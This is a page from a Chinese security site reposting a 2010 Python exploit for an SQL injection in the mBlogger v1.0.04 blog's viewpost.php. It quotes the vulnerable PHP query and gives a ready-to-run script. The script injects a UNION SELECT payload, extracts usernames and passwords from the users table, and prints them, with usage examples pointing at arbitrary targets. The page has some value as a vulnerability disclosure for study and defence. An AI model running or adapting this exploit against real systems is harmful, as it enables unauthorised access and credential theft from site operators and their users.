首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
来源:research[at]ptrace-security[dot]com 作者:Gianni 发布时间:2010-09-02  

#!/usr/bin/python
#
# Exploit Title:   mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
# Date         :   31 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/mblogger/
# Version      :   1.0.04
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + viewpost.php => SQL Injection!!
#
# 30: $query = "SELECT id, name, subject, message, posted FROM posts WHERE
#     id = '$_GET[postID]'";
# 31: $result = mysql_query($query) or die(mysql_error());
# 32: while($row = mysql_fetch_array($result, MYSQL_ASSOC))
# 33: {
# 34:  echo "<div class='posttitle'>";
# 35:  echo "<h3>" . $row['subject'] . "</h3>";
# 36:  echo "</div>";
# 37:  echo "<div class='postbody'>";
# 38:  echo "<p> Posted by: " . $row['name'] . " on " . $row['posted'] . "</p>";
# 39:  echo "<p>" . $row['message'] . "</p>";
# 40:  echo "</div>";
# 41:  $postID = $row['id'];
# 42: }
#

import re
import sys
import http.client


def usage(prog):
    print('Usage  : ' + prog + ' <target> <path>\n')
    print('Example: ' + prog + ' localhost /mBlogger/')
    print('         ' + prog + ' www.target.com /complet/path/')
    return


def exploit(target, path):
    payload  = 'viewpost.php?postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    payload += 'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    payload += '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'

    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()

    if res.status != 200:
        print('[!] HTTP GET Request Failed')
        exit(1)

    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
   
    print('[+] Information Extracted:\n')
    credentials = pattern.findall(data)
    for element in credentials:
        print(element)
   
    return

 

print('\n+-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit by Ptrace Security    |')
print('+-----------------------------------------------------------------------------+\n')

if len(sys.argv) != 3:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2])

exit(0)


   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MPLAB IDE .mcp .mcw DLL Hijack
·Leadtools ActiveX Common Dialo
·Spybot-S&D blindman.exe DLL Hi
·Adobe Acrobat Reader and Flash
·SnackAmp 3.1.2 Malicious SMP B
·TFTPDWIN v0.4.2 Directory Trav
·Apple QuickTime 7.6.7 _Marshal
·TFTP Desktop 2.5 Directory Tra
·Safari for windows Invalid SGV
·Autodesk MapGuide Viewer Activ
·Apple QuickTime "_Marshaled_pU
·Cpanel PHP Restriction Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved